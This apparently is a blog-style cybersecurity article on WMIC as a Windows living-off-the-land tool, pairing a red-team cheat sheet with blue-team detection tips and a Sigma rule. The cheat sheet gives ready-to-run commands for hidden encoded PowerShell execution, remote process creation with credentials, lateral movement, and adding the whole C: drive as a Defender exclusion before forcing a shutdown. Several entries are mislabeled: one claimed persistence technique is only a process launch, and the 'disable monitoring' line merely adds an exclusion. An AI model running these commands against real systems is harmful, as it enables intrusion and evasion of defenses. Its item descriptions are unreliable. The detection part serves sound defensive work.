WMIC: The Forgotten Windows Admin Tool That Still Haunts Red Teams and Blue Teams in 2025

Understanding Windows Management Instrumentation Command-line (WMIC) and Why It Refuses to Die in Modern Cybersecurity

WMIC is deprecated but not dead. Attackers still love it because it's native, signed by Microsoft, rarely blocked, and can do almost anything WMI can do—quietly. Defenders hate it for exactly the same reasons.

What is WMIC, Really?

WMIC (Windows Management Instrumentation Command-line) is a command-line interface to WMI (Windows Management Instrumentation) that shipped with every Windows version from XP to Windows 11 24H2 (and Server 2025).

Even though Microsoft officially deprecated WMIC in Windows 10 1709 (2017) and started showing the “deprecated” banner, the binary (wmic.exe) is still present and fully functional in 2025 on all supported Windows versions unless manually removed.

It's a classic Living-Off-the-Land Binary (LOLBin).

Why Attackers Still Love WMIC in 2025

  • 100% native, Microsoft-signed → evades most application allowlisting (AppLocker, WDAC)
  • Can execute commands remotely (with creds)
  • Can query almost anything on a Windows system
  • Leaves very little forensic evidence compared to PowerShell
  • Often excluded from EDR telemetry collection rules (legacy exemptions)

Common Red Team One-Liners (2025 Edition)

1 Basic Local Process Execution (No PowerShell)

wmic process call create "calc.exe"
wmic process call create "powershell.exe -nop -w hidden -enc <base64>"

2 Remote Code Execution (with domain/admin creds)

wmic /node:"192.168.10.50" /user:"DOMAIN\admin" /password:"P@ssw0rd!" process call create "cmd.exe /c whoami > C:\temp\pwned.txt"

3 Stealthy Lateral Movement via WMI Event Subscription (Persistence + Execution)

wmic /node:"TARGET01" /user:"DOMAIN\attacker" /password:"Secret123!" process call create "cmd /c powershell -enc <long-payload>"

4 Enumerate Local Administrators (Great for privilege auditing or hunting)

wmic path win32_groupuser where (GroupComponent="Win32_Group.Name=\"Administrators\"") | findstr /i "Administrator"

5 List Running Processes (Stealthier than tasklist in some EDRs)

wmic process get name,processid,commandline /format:list

6 Quietly Disable Windows Defender Real-Time Monitoring (needs admin)

wmic /namespace:\\root\microsoft\windows\defender path MSFT_MpPreference call Add ExclusionPath="C:\" & wmic path Win32_OperatingSystem call Win32Shutdown 4

7 Pull BIOS Serial + UUID (Useful for asset tagging or loot)

wmic bios get serialnumber
wmic csproduct get uuid

Detection & Hunting Tips (Blue Team Side)

TechniqueDetection Method
WMIC process creationSysmon Event ID 1 with Image = wmic.exe and CommandLine contains process call create
Suspicious parent-childParent = cmd.exe → Child = wmic.exe → Grandchild = powershell.exe or cmd.exe
Remote WMIC executionEvent ID 5145 (Network Share Access) + object name contains ROOT\CIMV2 or Event 5859 (WMI activity)
Legacy telemetry gapsMany EDRs still exclude wmic.exe from script block logging → enable CommandLine auditing (GPO: Advanced Audit Policy → Detailed Tracking → Process Creation)

Sigma Rule Example (Detect WMIC process creation abuse)

title: WMIC Process Creation Abuse
id: 764d100e-b334-4e1e-9c44-1b23f8616f21
detection:
  selection:
    Image: '*\\wmic.exe'
    CommandLine|contains: 'process call create'
  condition: selection
falsepositives:
  - Legitimate admin scripts (rare in 2025)
level: high

How to Kill WMIC in Your Environment (If You Dare)

# Option 1: Delete the binary (breaks nothing in 2025)
takeown /f C:\Windows\System32\wbem\wmic.exe
icacls C:\Windows\System32\wbem\wmic.exe /deny Everyone:(X)
del /f /q C:\Windows\System32\wbem\wmic.exe
del /f /q C:\Windows\SysWOW64\wbem\wmic.exe
 
# Option 2: AppLocker / WDAC rule
# Block executable: %SYSTEM32%\wbem\wmic.exe and %SYSWOW64%\wbem\wmic.exe

Note: PowerShell's Get-WmiObject / Invoke-WmiMethod were removed in PowerShell 7+. WMIC is one of the last built-in ways to abuse WMI from cmd.exe.

Final Verdict in 2025

WMIC is the cockroach of Windows LOLBins: deprecated, hated, but still crawling around corporate environments.
Red teams keep it in their back pocket because it still works everywhere.
Blue teams should treat any wmic process call create as malicious until proven otherwise.

Stay frosty.

Related Cybersecurity Guides and Tutorials: